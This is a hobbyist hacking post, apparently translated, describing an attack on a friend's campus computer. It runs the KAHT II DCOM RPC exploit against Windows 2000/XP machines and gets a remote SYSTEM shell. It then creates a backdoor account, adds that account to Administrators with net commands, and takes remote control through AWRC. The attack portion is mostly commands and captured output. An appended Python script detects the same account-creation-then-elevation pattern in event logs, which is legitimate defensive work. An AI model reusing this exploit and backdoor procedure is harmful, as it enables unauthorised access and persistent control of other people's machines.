Recently I've been messing around with a friend's computer at the campus, heh...!!! (to whoever this applies to, sorry yeah...). Honestly this is just for fun, not me trying to act smart or know-it-all, but maybe it can be a lesson for others. Here I want to share some knowledge that's actually old and stale... way back in World War 2 (hey, don't daydream in broad daylight...) I read an article in Echo ezine Release 4 about hacking Windows 2000 - XP SP1; SP2 is already patched for this.. I've tried it. OK, no need to talk too much, let's get straight to it...!!!

Tools used:
-> kaht2 (win)
-> AWRC (Remote - Client)
-> Sheer nerve
-> if possible, have your girlfriend keep you company so you stay motivated

* Kaht2
Go to the command prompt and run kaht2 like this:
C:\>kaht.exe

_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by [email protected]
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION Razz
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.

C:\> kaht 192.168.1.1 192.168.1.255 --> depends on the network you are on


[+] Targets: 192.168.1.2-192.168.1.255 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 33478
[+] Scan In Progress...
- Connecting to 192.168.1.10
Sending Exploit to a [Win2k] Server...FAILED
- Connecting to 192.168.1.12
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> <-- OK, we're now in on the target computer (192.168.1.12)
C:\WINDOWS\system32>net user <-- view the accounts on the target computer
--------------------------------------------------------------------
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
SUPPORT_388945a0
The command completed successfully.

C:\WINDOWS\system32>net
net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

C:\WINDOWS\system32>net user Qu4cK hello /add <-- add the login Qu4cK with password hello on the target computer
The command completed successfully.
C:\WINDOWS\system32>net user <-- let's check whether the Qu4cK login is there now
-----------------------------------------------------------------
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
Qu4cK SUPPORT_388945a0
The command completed successfully.

C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.

OK, the Qu4cK login is now on the target computer. Ugh, turns out we can only log in as a regular user; now let's put the Qu4cK login into the Administrators group

C:\WINDOWS\system32>net localgroup Administrators Qu4cK /add
The command completed successfully.

let's check once more whether it's still a regular user or has become an administrator.

C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.

Bingo, we're now administrator; now it's up to you guys what you want to do with that PC. Oops, forgot, we're not done yet...
now just run the AWRC you got (just look for it via Google...). OK, run AWRC first; once you're in the AWRC program, enter the IP in the Remote Host field, then enter the user and password we created on the target computer and click CONNECT.... Wait until the AWRC screen changes into the target's screen.
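As an added example (not part of the original post): the two-step pattern shown above, an account created and then added to Administrators a couple of minutes later, is exactly what a defender should be alerting on. The script below assumes a constructed tab-separated export of Windows security events and correlates account-creation events (ID 624 on Windows 2000/XP, 4720 on Vista and later) with privileged local-group additions (636 / 4732) for the same account within a short window.

```python
from datetime import datetime, timedelta

ACCOUNT_CREATED = {"624", "4720"}   # user account created (2000/XP id, Vista+ id)
LOCAL_GROUP_ADD = {"636", "4732"}   # member added to a security-enabled local group
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
WINDOW = timedelta(minutes=30)

# Constructed sample export (not a real log), one event per line:
# time <TAB> event id <TAB> subject (who did it) <TAB> target account <TAB> group
SAMPLE_EVENTS = """\
2007-06-28 10:44:10\t528\tJarkom\tJarkom\t-
2007-06-28 10:45:02\t624\tNT AUTHORITY\\SYSTEM\tQu4cK\t-
2007-06-28 10:47:30\t636\tNT AUTHORITY\\SYSTEM\tQu4cK\tAdministrators
2007-06-28 11:10:00\t624\tJarkom\tJarkom3\t-
2007-06-28 15:00:00\t636\tJarkom\tJarkom3\tUsers
"""

def parse_events(text):
    """Turn the tab-separated export into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, eid, subject, target, group = line.split("\t")
        events.append({"time": datetime.strptime(when, "%Y-%m-%d %H:%M:%S"),
                       "id": eid, "subject": subject, "target": target,
                       "group": group})
    return events

def find_backdoor_admins(events, window=WINDOW):
    """Return (target, subject, seconds between creation and elevation) for
    every account that is created and then put into a privileged local group
    within `window`. Events are processed in timestamp order."""
    created = {}   # target account -> (creation time, subject that created it)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] in ACCOUNT_CREATED:
            created[ev["target"]] = (ev["time"], ev["subject"])
        elif ev["id"] in LOCAL_GROUP_ADD and ev["group"].lower() in PRIVILEGED_GROUPS:
            if ev["target"] in created:
                t0, subject = created[ev["target"]]
                if ev["time"] - t0 <= window:
                    hits.append((ev["target"], subject,
                                 int((ev["time"] - t0).total_seconds())))
    return hits

if __name__ == "__main__":
    for target, subject, secs in find_backdoor_admins(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT: {target} created by {subject}, made admin {secs}s later")
```

Jarkom3 is not flagged because it only joined Users; a subject of NT AUTHORITY\SYSTEM creating accounts is itself worth a second look, since a shell spawned from an exploited service runs as SYSTEM rather than as an administrator sitting at the console.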

Maybe that's it for now... if anything's still unclear you can just mail me.. OK, thanks to everyone reading this article and to the Echo community, where I learned a lot.